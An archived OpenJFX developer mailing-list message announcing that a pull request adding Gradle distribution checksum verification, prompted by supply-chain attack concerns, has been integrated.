[prev in list] [next in list] [prev in thread] [next in thread] 

List:       openjdk-openjfx-dev
Subject:    Integrated: 8262236: Configure Gradle checksum verification
From:       John Neffenger <github.com+1413266+jgneff () openjdk ! java ! net>
Date:       2021-02-23 19:38:40
Message-ID: rYyeyGuOiRPp3tKBpm_AZUj85ozQl5-9ertM2syE2-o=.766e1d69-3424-4a8c-a07d-46d3059cac3b () github ! com
[Download RAW message or body]

On Tue, 23 Feb 2021 17:25:47 GMT, John Neffenger \
<github.com+1413266+jgneff@openjdk.org> wrote:

> The recent supply-chain attacks in the news are making me nervous! 😟
> 
> The Gradle 6.3 distribution is the only software on my OpenJFX build system that \
> doesn't come from an Ubuntu package or a GitHub repository. Ubuntu uses digital \
> signatures to authenticate each package, and Git uses a secure hash algorithm to \
> ensure the integrity of each file, but there is no such check of the Gradle \
> distribution before running it. During my OpenJFX builds, Gradle is downloaded from \
> a Cloudflare server through an HTTPS proxy server, and there's no guarantee that \
> it's the same file as the one published by the Gradle developers. 
> This pull requests adds the additional step of verifying the Gradle distribution on \
> the build system before extracting its archive and running it. 
> We might also consider adding the [Gradle Wrapper \
> Validation](https://github.com/marketplace/actions/gradle-wrapper-validation) \
> GitHub Action to the OpenJFX repository.

This pull request has now been integrated.

Changeset: dc342d33
Author:    John Neffenger <john@status6.com>
Committer: Kevin Rushforth <kcr@openjdk.org>
URL:       https://git.openjdk.java.net/jfx/commit/dc342d33
Stats:     1 line in 1 file changed: 1 ins; 0 del; 0 mod

8262236: Configure Gradle checksum verification

Reviewed-by: kcr

-------------

PR: https://git.openjdk.java.net/jfx/pull/411


[prev in list] [next in list] [prev in thread] [next in thread]